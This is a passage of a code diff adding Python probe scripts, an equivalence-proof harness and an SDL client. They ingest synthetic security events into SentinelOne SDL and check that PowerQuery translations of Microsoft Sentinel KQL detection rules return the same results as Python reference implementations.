+        # NOTE(review): confirm "values" is what power_query returns here.
+        matches = (res.get("values") or res.get("matches")
+                   or res.get("data") or res.get("results"))
+        print(f"PowerQuery response keys: {list(res.keys())}")
+        if matches is not None:
+            print(f"Match count: {len(matches) if hasattr(matches, '__len__') else matches}")
+        else:
+            print(res)
+    else:
+        print(res)
+
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,42 @@
+#!/usr/bin/env python3
+"""After bash run_proof.sh, check what's queryable for the latest run."""
+import sys, json, time
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query
+
+# Look at the latest proof_run_id from the log. The log may hold several
+# runs, so take the LAST match rather than the first one.
+log = (ROOT / "reports" / "run.log").read_text()
+import re
+run_ids = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
+RUN_ID = run_ids[-1] if run_ids else None
+print(f"Latest proof_run_id from log: {RUN_ID}")
+if RUN_ID is None:
+    # Keep going: the "any run" query below is still useful, but make it
+    # obvious why the run-scoped queries will come back empty.
+    print("WARNING: no proof_run_id found in reports/run.log; "
+          "run-scoped queries below will match nothing")
+
+# Flat list of alternating label / query entries.
+QUERIES = [
+    "any event for this run",
+    f"proof_run_id='{RUN_ID}' | group n=count()",
+    "by event_type for this run",
+    f"proof_run_id='{RUN_ID}' | group n=count() by event_type",
+    "all kql-proof logfile (any run)",
+    "logfile contains 'kql-proof' | group n=count() by event_type",
+    "rule 1 raw query that errors",
+    f"proof_run_id='{RUN_ID}' event_type='SigninLogs' | filter ts_epoch_ms >= 0 "
+    "| group LocationCount = estimate_distinct(Location), "
+    "LocationList = group_unique_values(Location), LogonCount = count() "
+    "by UserPrincipalName, AppDisplayName | filter LocationCount >= 3",
+]
+
+# Even positions are labels, odd positions are the matching queries.
+for label, q in zip(QUERIES[0::2], QUERIES[1::2]):
+    print()
+    print("=" * 80)
+    print(f"# {label}")
+    print(f"  q: {q}")
+    t = time.time()
+    r = power_query(q, "1h")
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} took={time.time()-t:.1f}s")
+    if r.get("status", "").startswith("error/"):
+        print(f"  ERROR: {json.dumps(r)[:600]}")
+    # Column names are the same for every row, so resolve them once.
+    cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
+    for row in (r.get("values") or [])[:10]:
+        print("    ", dict(zip(cols, row)))
@@ -0,0 +1,92 @@
+#!/usr/bin/env python3
+"""Probe: does SDL index JSON keys that contain literal dots?
+
+If yes, we can ship synthetic OCSF events with keys like
+`"event.category": "logins"` and query them with the same dotted
+syntax the published runnable example uses, keeping the OCSF
+look-and-feel without needing a server-side parser to flatten
+nested objects.
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from datetime import datetime, timedelta, timezone
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import upload_logs, power_query  # noqa: E402
+
+
+def main() -> int:
+    """Upload one event with dotted keys and probe how it can be queried.
+
+    Returns:
+        0 after running all probes, or 1 if the uploaded event never became
+        queryable within the polling budget (20 polls, 2 s apart).
+    """
+    run_id = f"dot-probe-{uuid.uuid4().hex[:8]}"
+    now = datetime.now(timezone.utc).replace(microsecond=0)
+    thirty_seconds_ago = now - timedelta(seconds=30)
+    ts_ms = int(thirty_seconds_ago.timestamp() * 1000)
+
+    event = {
+        "TimeGenerated": now.strftime("%Y-%m-%dT%H:%M:%S.000Z"),
+        "ts_epoch_ms": ts_ms,
+        "proof_run_id": run_id,
+        # literal dots in the key (NOT nested objects)
+        "event.category": "logins",
+        "event.login.userName": "alice@contoso.com",
+        "event.login.loginIsSuccessful": False,
+        "endpoint.name": "host-alpha",
+    }
+    upload_reply = upload_logs(json.dumps(event))
+    print("upload:", upload_reply.get("status"))
+
+    # Poll until the event shows up in a count query, or give up.
+    print("indexing", end="", flush=True)
+    count_query = f"proof_run_id='{run_id}' | group n=count()"
+    count = 0
+    polls = 0
+    while polls < 20 and count < 1:
+        polls += 1
+        time.sleep(2)
+        reply = power_query(count_query, "5m")
+        values = reply.get("values") or []
+        if values and values[0] and values[0][0] is not None:
+            count = int(values[0][0])
+        else:
+            count = 0
+        print(f" {count}", end="", flush=True)
+    print()
+
+    if count == 0:
+        print("event did not become queryable; aborting")
+        return 1
+
+    # (label, query) pairs exercising dotted keys as filters and projections.
+    probes = [
+        ("filter event.category",
+         f"proof_run_id='{run_id}' AND event.category='logins' | limit 2"),
+        ("project event.category",
+         f"proof_run_id='{run_id}' | columns c=event.category | limit 2"),
+        ("project endpoint.name",
+         f"proof_run_id='{run_id}' | columns h=endpoint.name | limit 2"),
+        ("project event.login.userName",
+         f"proof_run_id='{run_id}' | columns u=event.login.userName | limit 2"),
+        ("filter event.login.loginIsSuccessful",
+         f"proof_run_id='{run_id}' AND event.login.loginIsSuccessful='false' | limit 2"),
+        ("bracket access",
+         f"proof_run_id='{run_id}' AND \"event.category\"='logins' | limit 2"),
+        ("see all top-level cols of one row",
+         f"proof_run_id='{run_id}' | limit 1"),
+    ]
+    for label, q in probes:
+        reply = power_query(q, "5m")
+        status = reply.get("status")
+        matching = reply.get("matchingEvents")
+        msg = (reply.get("message") or "")[:140]
+        print(f"\n[{label}]")
+        print(f"  q     : {q}")
+        print(f"  status: {status}  matching: {matching}  msg: {msg}")
+        col_names = []
+        for col in reply.get("columns") or []:
+            col_names.append(col.get("name") if isinstance(col, dict) else col)
+        print(f"  cols  : {col_names}")
+        for value_row in (reply.get("values") or [])[:2]:
+            # Long rows are cut to 200 characters to keep the output readable.
+            print(f"  val   : {str(value_row)[:200]}")
+    return 0
+
+
+if __name__ == "__main__":
+    sys.exit(main())
@@ -0,0 +1,60 @@
+#!/usr/bin/env python3
+"""Compare the EXACT addEvents payload used by ingest_jsonl with a known-good
+manual one. Add a unique probe marker so we can tell whether it actually
+landed in SDL."""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+
+from harness.sdl_client import add_events, power_query, _clean_attrs  # noqa: E402
+
+JSONL = ROOT / "sample_data" / "events.jsonl"
+PROBE = uuid.uuid4().hex[:8]
+
+# Build addEvents payloads from the first 3 JSONL records. Each record gets
+# its own probe marker and is converted inline (rather than through a helper)
+# so the exact payload can be printed before it is submitted.
+events = []
+with JSONL.open() as handle:
+    for position, raw_line in enumerate(handle):
+        if position >= 3:
+            break
+        record = json.loads(raw_line)
+        record["probe"] = f"{PROBE}_{position}"
+        epoch_ms = int(record["ts_epoch_ms"])
+        event = {
+            "ts": str(epoch_ms * 1_000_000),  # ms -> ns, sent as a string
+            "sev": 3,
+            "thread": "T1",
+            "attrs": _clean_attrs(record),
+        }
+        events.append(event)
+
+print(f"=== Payload ({len(events)} events) ===")
+payload_dump = json.dumps(events, indent=2, default=str)
+print(payload_dump[:3000])
+print()
+print(f"=== Submitting (probe prefix={PROBE}) ===")
+submit_resp = add_events(events)
+print(f"addEvents -> {json.dumps(submit_resp)}")
+
+print("\nWaiting 12 s for indexing ...")
+time.sleep(12)
+
+# Look the probe marker up again to see which events became queryable.
+probe_query = f"probe contains '{PROBE}' | columns event_type, probe, ts_epoch_ms | limit 10"
+print(f"\nQuery: {probe_query}")
+query_resp = power_query(probe_query, "10m")
+print(f"Result -> matching={query_resp.get('matchingEvents')}")
+for found in query_resp.get("values") or []:
+    print("  ", found)
+
+# Report how old each submitted timestamp is relative to the wall clock.
+import datetime as dt
+wall_now_ms = int(time.time() * 1000)
+print(f"\nreal_now_ms = {wall_now_ms}")
+for sent in events:
+    sent_ms = int(sent["ts"]) // 1_000_000
+    age_minutes = (wall_now_ms - sent_ms) / 60000
+    print(f"  event ts_ms={sent_ms}  age={age_minutes:.2f} min  attrs.event_type={sent['attrs']['event_type']}")
@@ -0,0 +1,85 @@
+#!/usr/bin/env python3
+"""Find out what attribute(s) in our generated events cause SDL to reject them.
+
+Send increasingly complex events under unique markers and see which ones
+SDL accepts (queryable within 10s) vs silently drops.
+"""
+from __future__ import annotations
+
+import json
+import sys
+import time
+import uuid
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+
+from harness.sdl_client import add_events, power_query, _clean_attrs  # noqa: E402
+
+TS_NOW_MS = int(time.time() * 1000)
+
+
+def mk(attrs: dict, offset_sec: int = 0):
+    """Wrap *attrs* in an addEvents-style event dict.
+
+    The timestamp is TS_NOW_MS moved back by *offset_sec* seconds, converted
+    from milliseconds to nanoseconds and rendered as a string.
+    """
+    event_ms = TS_NOW_MS - offset_sec * 1000
+    event = {"ts": str(event_ms * 1_000_000)}
+    event["sev"] = 3
+    event["thread"] = "T1"
+    event["attrs"] = attrs
+    return event
+
+
+# Every case carries "<PROBE>_<letter>" in its `probe` attribute so it can be
+# looked up individually after ingestion. Offsets keep the timestamps distinct.
+PROBE = uuid.uuid4().hex[:8]
+cases = [
+    ("A_minimal_2_attrs",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_A"}, 60)),
+    ("B_one_int_attr",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_B",
+         "SentBytes": 2048}, 55)),
+    # The value must actually be negative for this case to test what its
+    # label says (it previously sent a positive 5).
+    ("C_one_negative_int",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_C",
+         "SentBytes": 2048, "LogSeverity": -5}, 50)),
+    ("D_with_special_chars",
+     mk({"event_type": "CommonSecurityLog", "probe": f"{PROBE}_D",
+         "Message": "allow web access to 142.250.74.110 port 443"}, 45)),
+    ("E_with_backslashes",
+     mk({"event_type": "SecurityEvent", "probe": f"{PROBE}_E",
+         "NewProcessName": "C:\\Windows\\System32\\svchost.exe"}, 40)),
+    ("F_realistic_csl_via_clean",
+     mk(_clean_attrs({
+         "event_type": "CommonSecurityLog", "probe": f"{PROBE}_F",
+         "TimeGenerated": "2026-05-31T16:50:00.000Z",
+         "ts_epoch_ms": TS_NOW_MS - 30000,
+         "DeviceVendor": "Palo Alto Networks", "Activity": "TRAFFIC",
+         "DeviceName": "pa-fw-01", "SourceUserID": "alice",
+         "SourceIP": "10.0.1.10", "SourcePort": 49000,
+         "DestinationIP": "142.250.74.110", "DestinationPort": 443,
+         "SentBytes": 2048, "ReceivedBytes": 16384,
+         "Message": "allow", "DeviceEventClassID": "end", "LogSeverity": 3,
+         "DeviceAction": "allow", "DeviceProduct": "PAN-OS",
+     }), 30)),
+    # None-valued attributes are passed through _clean_attrs, which drops them.
+    ("G_realistic_csl_with_None",
+     mk(_clean_attrs({
+         "event_type": "CommonSecurityLog", "probe": f"{PROBE}_G",
+         "TimeGenerated": "2026-05-31T16:50:00.000Z",
+         "ts_epoch_ms": TS_NOW_MS - 20000,
+         "DeviceVendor": "Palo Alto Networks", "Activity": None,
+         "Message": None,
+     }), 20)),
+]
+
+# Submit all probe events in a single addEvents call.
+payload = [event for _, event in cases]
+print(f"=== Sending {len(cases)} probe events ===")
+upload_resp = add_events(payload)
+print(f"addEvents -> {json.dumps(upload_resp)}")
+
+print("\nWaiting 12 s for indexing ...")
+time.sleep(12)
+
+# Query each probe marker on its own and report whether the event is there.
+print("\n=== Per-case verification ===")
+for case_name, event in cases:
+    marker = event["attrs"]["probe"]
+    result = power_query(
+        f"probe='{marker}' | columns event_type, probe | limit 1", "10m")
+    matched = result.get("matchingEvents", 0)
+    if matched and matched > 0:
+        verdict = "OK"
+    else:
+        verdict = "MISSING"
+    found_rows = result.get("values") or []
+    print(f"  {case_name:35s} matching={matched}  status={verdict}  -> {found_rows}")
@@ -0,0 +1,33 @@
+#!/usr/bin/env python3
+"""Manually run rule 4's query against the latest run_id."""
+import sys, json, time
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query
+
+log = (ROOT / "reports" / "run.log").read_text()
+import re
+# Use the last run id and RECENT_MS value that appear in the log.
+run_ids = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
+recent_values = re.findall(r"RECENT_MS = (\d+)", log)
+if not run_ids or not recent_values:
+    # Without both values every query below would be meaningless; stop with a
+    # clear message instead of an IndexError on the [-1] lookup.
+    sys.exit("reports/run.log contains no proof_run_id / RECENT_MS entries")
+RUN = run_ids[-1]
+RECENT_MS = recent_values[-1]
+print(f"RUN = {RUN}\nRECENT_MS = {RECENT_MS}\n")
+
+# (label, query) pairs, executed in order.
+QS = [
+    ("rule 4 exact",
+     f"proof_run_id='{RUN}' event_type='SigninLogs' | filter ts_epoch_ms >= {RECENT_MS} | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName"),
+    ("rule 4 without ts filter",
+     f"proof_run_id='{RUN}' event_type='SigninLogs' | group LocationCount = estimate_distinct(Location), DistinctSourceIp = estimate_distinct(IPAddress), LogonCount = count() by AppDisplayName, UserPrincipalName"),
+    ("show 5 SigninLogs columns",
+     f"proof_run_id='{RUN}' event_type='SigninLogs' | columns AppDisplayName, UserPrincipalName, Location, IPAddress, ts_epoch_ms | limit 5"),
+]
+for label, q in QS:
+    print("=" * 80)
+    print(f"# {label}")
+    print(f"  q: {q[:200]}")
+    r = power_query(q, "30m")
+    # Columns may come back as dicts with a "name" key or as plain names.
+    cols = [c.get("name") if isinstance(c, dict) else c
+            for c in (r.get("columns") or [])]
+    vals = r.get("values") or []
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')} rows={len(vals)}")
+    for row in vals[:8]:
+        print(f"    {dict(zip(cols, row))}")
+    # `or ""` keeps a null status from breaking the startswith check.
+    if (r.get("status") or "").startswith("error/"):
+        print(f"  ERROR: {json.dumps(r)[:400]}")
@@ -0,0 +1,40 @@
+#!/usr/bin/env python3
+"""Check how SDL stores ts_epoch_ms: number vs string."""
+import sys, json, time
+from pathlib import Path
+ROOT = Path(__file__).resolve().parents[1]; sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query
+
+# Use the most recent run_id from the log
+log = (ROOT / "reports" / "run.log").read_text()
+import re
+m = re.findall(r"proof_run_id=([A-Za-z0-9-]+)", log)
+RUN = m[-1] if m else None
+print(f"run_id = {RUN}")
+if RUN is None:
+    # Without a run id every query below would be scoped to the literal
+    # string 'None' and report misleading zero counts.
+    sys.exit("reports/run.log contains no proof_run_id entry")
+
+# Lower bound for the "NOW-2h" case, in epoch milliseconds.
+TWO_HOURS_AGO_MS = int(time.time()*1000) - 2*3600*1000
+
+CASES = [
+    ("show 3 SigninLogs with ts_epoch_ms",
+     f"proof_run_id='{RUN}' event_type='SigninLogs' | columns ts_epoch_ms, UserPrincipalName | limit 3"),
+    ("count where ts_epoch_ms exists (any)",
+     f"proof_run_id='{RUN}' ts_epoch_ms=* | group n=count()"),
+    ("count where ts_epoch_ms > number",
+     f"proof_run_id='{RUN}' | filter ts_epoch_ms > 1000000000000 | group n=count()"),
+    ("count where ts_epoch_ms (as string) > '0'",
+     f"proof_run_id='{RUN}' | filter ts_epoch_ms > '0' | group n=count()"),
+    ("count where ts_epoch_ms >= NOW-2h numeric",
+     f"proof_run_id='{RUN}' | filter ts_epoch_ms >= " + str(TWO_HOURS_AGO_MS) + " | group n=count()"),
+    ("min/max ts_epoch_ms aggregate",
+     f"proof_run_id='{RUN}' | group mn=min(ts_epoch_ms), mx=max(ts_epoch_ms), n=count()"),
+    ("event_type filter alone",
+     f"proof_run_id='{RUN}' event_type='SigninLogs' | group n=count()"),
+]
+for name, q in CASES:
+    print("=" * 80)
+    print(f"# {name}")
+    print(f"  q: {q}")
+    r = power_query(q, "30m")
+    # Columns may come back as dicts with a "name" key or as plain names.
+    cols = [c.get("name") if isinstance(c, dict) else c for c in (r.get("columns") or [])]
+    vals = r.get("values") or []
+    print(f"  status={r.get('status')} matching={r.get('matchingEvents')}")
+    for row in vals[:5]:
+        print(f"    {dict(zip(cols, row))}")
@@ -0,0 +1,199 @@
+#!/usr/bin/env python3
+"""End-to-end proof harness.
+
+Steps:
+  1. Loads sample_data/events.jsonl into memory.
+  2. Runs each rule's Python reference implementation against the in-memory
+     events. This is the canonical "ground truth" – the same logical operation
+     that both the KQL and the PowerQuery engines evaluate.
+  3. Optionally ingests the events to SentinelOne SDL via /api/uploadLogs,
+     then runs each rule's PowerQuery via /api/powerQuery and compares the
+     fired set against the reference.
+  4. Emits reports/PROOF.md with side-by-side results.
+
+Run modes:
+    python harness/prove_equivalence.py                # local-only proof
+    python harness/prove_equivalence.py --pq           # also run each PQ (no run scoping)
+    python harness/prove_equivalence.py --ingest --pq  # ingest, then run run-scoped PQs
+"""
+from __future__ import annotations
+
+import argparse
+import json
+import sys
+import time
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+
+from rules import RULES, NOW, RECENT_START  # noqa: E402
+
+SAMPLE = ROOT / "sample_data" / "events.jsonl"
+REPORT = ROOT / "reports" / "PROOF.md"
+REPORT_JSON = ROOT / "reports" / "PROOF.json"
+
+
+def load_events() -> list[dict]:
+    """Parse SAMPLE as JSONL and return one dict per non-blank line.
+
+    The file is decoded as UTF-8 explicitly so the result does not depend on
+    the platform's locale encoding.
+    """
+    text = SAMPLE.read_text(encoding="utf-8")
+    return [json.loads(line) for line in text.splitlines() if line.strip()]
+
+
+def canonical(rule, rows):
+    """Return the distinct keys of *rows*, ordered by their string form.
+
+    Each key is produced by calling ``rule["key"]`` on a row; duplicates
+    collapse, so the keys must be hashable.
+    """
+    key_of = rule["key"]
+    distinct = set()
+    for row in rows:
+        distinct.add(key_of(row))
+    return sorted(distinct, key=str)
+
+
+def run_local(events):
+    """Run every rule's Python reference over *events*.
+
+    Returns a dict keyed by rule id. Each entry holds the rule description,
+    the rows the reference fired and their canonical key list.
+    """
+    results = {}
+    for rule in RULES:
+        fired = rule["ref"](events)
+        entry = dict(
+            description=rule["description"],
+            fired_rows=fired,
+            fired_keys=canonical(rule, fired),
+        )
+        results[rule["id"]] = entry
+    return results
+
+
+def run_pq(run_id: str | None = None):
+    """Run every rule's PowerQuery against SDL and collect the outcome.
+
+    Args:
+        run_id: when given, each query is prefixed with
+            ``proof_run_id='<run_id>' `` so it only sees that run's events.
+
+    Returns:
+        Dict keyed by rule id. Successful entries carry ``ok=True``,
+        ``rowcount``, at most the first 50 ``rows``, ``status`` and
+        ``matching``. Failed entries carry ``ok=False`` and ``error``.
+        A response whose status starts with "error" counts as a failure,
+        because power_query returns such responses instead of raising.
+    """
+    from sdl_client import power_query
+    out = {}
+    recent_ms = int(RECENT_START.timestamp() * 1000)
+    scope = f"proof_run_id='{run_id}' " if run_id else ""
+    print(f"  scope     = {scope.strip() or '(none)'}")
+    print(f"  RECENT_MS = {recent_ms}  ({RECENT_START.isoformat()})")
+    print(f"  NOW       = {NOW.isoformat()}")
+    print()
+    for i, r in enumerate(RULES, 1):
+        q = scope + r["pq"].format(RECENT_MS=str(recent_ms))
+        print(f"  [{i:>2}/{len(RULES)}] {r['id']:<48} ", end="", flush=True)
+        t0 = time.time()
+        try:
+            resp = power_query(q, start_time="2h")
+            status = resp.get("status", "ok")
+            if str(status).startswith("error"):
+                # Route error responses through the same failure path as
+                # exceptions so they are not reported as "0 rows".
+                detail = resp.get("message") or resp.get("raw") or ""
+                raise RuntimeError(f"{status}: {detail}")
+            cols_meta = resp.get("columns") or []
+            cols = [c["name"] if isinstance(c, dict) else c for c in cols_meta]
+            vals = resp.get("values") or []
+            rows = [dict(zip(cols, v)) for v in vals]
+            elapsed = time.time() - t0
+            print(f"-> {len(rows):>3} rows  matching={resp.get('matchingEvents')} "
+                  f"({elapsed:.1f}s, {status})")
+            out[r["id"]] = {"ok": True, "rowcount": len(rows),
+                            "rows": rows[:50], "status": status,
+                            "matching": resp.get("matchingEvents")}
+        except Exception as e:
+            elapsed = time.time() - t0
+            msg = str(e)[:200]
+            print(f"-> ERROR ({elapsed:.1f}s): {msg}")
+            out[r["id"]] = {"ok": False, "error": msg}
+    return out
+
+
+def ingest():
+    """Ingest SAMPLE into SDL and wait until the events are queryable.
+
+    Polls a run-scoped count every 2 s, up to 30 times. Returns the run id
+    whether or not the full count was reached.
+    """
+    from sdl_client import ingest_jsonl, power_query
+    sent, run_id = ingest_jsonl(SAMPLE)
+    print(f"Ingested {sent} events to SDL  (proof_run_id={run_id})")
+    count_query = f"proof_run_id='{run_id}' | group n=count()"
+    print("Waiting for SDL indexing ...", end="", flush=True)
+    for _attempt in range(30):  # up to 60s
+        time.sleep(2)
+        resp = power_query(count_query, "30m")
+        values = resp.get("values") or []
+        first_row = values[0] if values else None
+        if first_row and first_row[0] is not None:
+            indexed = int(first_row[0])
+        else:
+            indexed = 0
+        print(f" {indexed}", end="", flush=True)
+        if indexed >= sent:
+            print(" ✓ ready")
+            break
+    else:
+        print(" (timeout, proceeding anyway)")
+    return run_id
+
+
+def write_report(local_results, pq_results=None):
+    """Write reports/PROOF.md and reports/PROOF.json.
+
+    Args:
+        local_results: output of run_local (per-rule reference rows and keys).
+        pq_results: optional output of run_pq. When given, each rule section
+            also shows the SDL row count and whether the PQ key set matches
+            the reference key set.
+
+    Both files are written as UTF-8 because the report contains non-ASCII
+    characters, which a non-UTF-8 locale encoding may be unable to encode.
+    """
+    # parents=True so a missing ancestor directory is created as well.
+    REPORT.parent.mkdir(parents=True, exist_ok=True)
+    md = ["# KQL ↔ PowerQuery equivalence proof",
+          "",
+          f"Sample dataset: `sample_data/events.jsonl` ({len(load_events())} events)",
+          f"Time anchor (NOW): `{NOW.isoformat()}`",
+          f"Recent window start: `{RECENT_START.isoformat()}`",
+          "",
+          "Each rule below is expressed three ways:",
+          "1. **KQL** — verbatim/condensed from the Microsoft Sentinel docs.",
+          "2. **PowerQuery (PQ)** — SDL equivalent, runnable on `<XDR endpoint>`.",
+          "3. **Python reference** — canonical implementation of the same logical "
+          "operation tree against the in-memory dataset. Acts as ground truth.",
+          "",
+          "The PowerQuery is considered equivalent to the KQL when its result "
+          "set matches the Python reference. The Python reference encodes the "
+          "*same operations* that the KQL parser/optimiser would produce, so a "
+          "match certifies KQL/PQ parity on this dataset.",
+          ""]
+    for r in RULES:
+        rid = r["id"]
+        loc = local_results[rid]
+        md += [f"## {rid}", "",
+               f"_{r['description']}_", "",
+               "### KQL", "```kusto", r["kql"].strip(), "```",
+               "### PowerQuery", "```", r["pq"].strip(), "```",
+               f"### Reference fired: {len(loc['fired_rows'])} row(s)"]
+        if loc["fired_rows"]:
+            sample = loc["fired_rows"][:5]
+            md.append("```json")
+            md.append(json.dumps(sample, default=str, indent=2))
+            md.append("```")
+        if pq_results:
+            pq = pq_results.get(rid, {})
+            if pq.get("ok"):
+                # NOTE: run_pq stores at most 50 rows per rule, so the key
+                # comparison only sees those rows.
+                pq_keys = []
+                for row in pq.get("rows", []):
+                    try:
+                        pq_keys.append(r["key"](row))
+                    except Exception:
+                        # Row lacks the fields the rule key needs; fall back
+                        # to the whole row so it still shows up in the diff.
+                        pq_keys.append(tuple(row.items()))
+                pq_keys = sorted(set(pq_keys), key=str)
+                ref_keys = loc["fired_keys"]
+                match = "✅ MATCH" if pq_keys == ref_keys else "⚠️ DIFFERS"
+                md += [f"### SDL PowerQuery result: {pq['rowcount']} row(s) — {match}"]
+                if pq_keys != ref_keys:
+                    md += ["Reference keys:", "```",
+                           json.dumps([list(k) for k in ref_keys], default=str), "```",
+                           "PQ keys:", "```",
+                           json.dumps([list(k) for k in pq_keys], default=str), "```"]
+            else:
+                md.append(f"### SDL PowerQuery error: `{pq.get('error', '?')}`")
+        md.append("")
+    REPORT.write_text("\n".join(md), encoding="utf-8")
+    REPORT_JSON.write_text(json.dumps(
+        {"local": {k: {"fired_keys": [list(x) for x in v["fired_keys"]],
+                       "n": len(v["fired_rows"])}
+                   for k, v in local_results.items()},
+         "pq": pq_results or {}},
+        default=str, indent=2), encoding="utf-8")
+    print(f"Wrote {REPORT}")
+
+
+def main():
+    """CLI entry point: run the local reference, optionally ingest and run
+    the PowerQueries, then write the report.
+
+    ``--ingest`` uploads the sample events and yields a run id; ``--pq`` runs
+    every rule's PowerQuery, scoped to that run id when one exists.
+    """
+    parser = argparse.ArgumentParser()
+    parser.add_argument("--ingest", action="store_true",
+                        help="Ingest sample events to SDL before querying")
+    parser.add_argument("--pq", action="store_true",
+                        help="Also run each PQ against SDL and compare")
+    opts = parser.parse_args()
+
+    events = load_events()
+    print(f"Loaded {len(events)} events")
+    local_results = run_local(events)
+    fired_total = 0
+    for result in local_results.values():
+        fired_total += len(result["fired_rows"])
+    print(f"Local reference: {fired_total} total fired rows across {len(RULES)} rules")
+
+    run_id = ingest() if opts.ingest else None
+    pq_results = run_pq(run_id=run_id) if opts.pq else None
+
+    write_report(local_results, pq_results)
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,78 @@
+#!/usr/bin/env python3
+"""Run every .pq file in pq/ AND docs/runnable_examples/ for startTime=2h
+and assert each returns matching > 0.
+
+Prereqs:
+  * sample_data/events.jsonl ingested via prove_equivalence.py --ingest
+    (drives all 17 rule PQs in pq/)
+  * seed_runnable_examples.py executed (drives docs/runnable_examples/*.pq)
+
+Outputs a one-line-per-query report and exits 0 iff every query returned
+at least one row.
+"""
+from __future__ import annotations
+
+import re
+import sys
+import time
+from pathlib import Path
+
+ROOT = Path(__file__).resolve().parents[1]
+sys.path.insert(0, str(ROOT))
+from harness.sdl_client import power_query  # noqa: E402
+
+
+def strip_comments(text: str) -> str:
+    """Remove every line whose first non-blank characters are `//`.
+
+    The remaining lines are re-joined with newlines and the result is
+    stripped of leading/trailing whitespace. Trailing `//` text on a code
+    line is left untouched.
+    """
+    kept = []
+    for line in text.splitlines():
+        if line.lstrip().startswith("//"):
+            continue
+        kept.append(line)
+    return "\n".join(kept).strip()
+
+
+# Collect every .pq file from both directories, sorted within each directory.
+DIRS = [ROOT / "pq", ROOT / "docs" / "runnable_examples"]
+files = []
+for d in DIRS:
+    files.extend(sorted(d.glob("*.pq")))
+
+if not files:
+    print("No .pq files found.")
+    sys.exit(1)
+
+print(f"Running {len(files)} PowerQueries (startTime=2h, assert matching>0)\n")
+
+passed: list[str] = []
+failed: list[tuple[str, str]] = []  # (relpath, reason)
+
+for f in files:
+    body = strip_comments(f.read_text())
+    rel = f.relative_to(ROOT)
+    t0 = time.time()
+    try:
+        r = power_query(body, start_time="2h")
+    except Exception as e:
+        failed.append((str(rel), f"exception: {e}"))
+        print(f"  ✗ {rel}  exception: {e}")
+        continue
+    elapsed = time.time() - t0
+    # `or` guards: a null status/message in the response must be recorded as
+    # a failure rather than crash the run with a TypeError.
+    status = r.get("status") or ""
+    matching = r.get("matchingEvents", 0) or 0
+    if status != "success":
+        msg = (r.get("message") or "")[:200]
+        failed.append((str(rel), f"{status}: {msg}"))
+        print(f"  ✗ {rel}  [{status}] {msg}")
+        continue
+    if matching <= 0:
+        failed.append((str(rel), "matching=0"))
+        print(f"  ✗ {rel}  matching=0 ({elapsed:.1f}s)")
+        continue
+    print(f"  ✓ {rel}  matching={matching} ({elapsed:.1f}s)")
+    passed.append(str(rel))
+
+print()
+print(f"PASS: {len(passed)}    FAIL: {len(failed)}    TOTAL: {len(files)}")
+
+if failed:
+    print("\nFailed queries:")
+    for rel, why in failed:
+        print(f"  {rel}: {why}")
+    sys.exit(1)
+
+print("\nAll PowerQueries returned results within the last 2h ✓")
@@ -0,0 +1,134 @@
+"""SentinelOne SDL client (uses `requests` for reliable I/O)."""
+from __future__ import annotations
+
+import json
+import time
+from pathlib import Path
+
+import requests
+
+ROOT = Path(__file__).resolve().parents[1]
+CFG = json.loads((ROOT / "config.json").read_text())
+
+import os, uuid
+
+BASE = CFG["base_url"].rstrip("/")
+WRITE_KEY = CFG["log_write_key"]
+READ_KEY = CFG["log_read_key"]
+# Make the session unique per *process* so SDL never dedupes re-runs of the
+# same payload (SDL hashes session+ts on the server side and silently drops
+# events whose (session, ts) tuple was already accepted -> bytesCharged=0).
+SESSION = os.environ.get("KQL_PROOF_SESSION") or f"kql-proof-{uuid.uuid4()}"
+VERIFY = CFG.get("verify_tls", True)
+TIMEOUT = CFG.get("timeout_seconds", 120)
+print(f"[sdl_client] session = {SESSION}")
+
+
+def _post(path: str, body: dict, token: str, timeout: int | None = None) -> dict:
+    """POST *body* as JSON to ``BASE + path`` using a bearer *token*.
+
+    Uses *timeout* when it is truthy, otherwise the module-level TIMEOUT.
+    Returns the decoded JSON response. If the response body is not JSON,
+    returns an error dict carrying the HTTP status and the first 500
+    characters of the raw text.
+    """
+    request_headers = {
+        "Content-Type": "application/json",
+        "Authorization": f"Bearer {token}",
+    }
+    response = requests.post(
+        f"{BASE}{path}",
+        json=body,
+        headers=request_headers,
+        timeout=timeout or TIMEOUT,
+        verify=VERIFY,
+    )
+    try:
+        decoded = response.json()
+    except ValueError:
+        decoded = {"status": "error",
+                   "http_status": response.status_code,
+                   "raw": response.text[:500]}
+    return decoded
+
+
+# --- addEvents -------------------------------------------------------------
+def add_events(events: list[dict], session_info: dict | None = None) -> dict:
+    """POST *events* to /api/addEvents under the process-wide SESSION.
+
+    When *session_info* is falsy, a default serverHost/logfile/parser block
+    is sent instead. Returns the response dict from _post.
+    """
+    if not session_info:
+        session_info = {
+            "serverHost": "kql-proof",
+            "logfile": "kql-proof.jsonl",
+            "parser": "json",
+        }
+    request_body = {
+        "session": SESSION,
+        "sessionInfo": session_info,
+        "events": events,
+        "threads": [{"id": "T1", "name": "kql-proof"}],
+    }
+    return _post("/api/addEvents", request_body, WRITE_KEY)
+
+
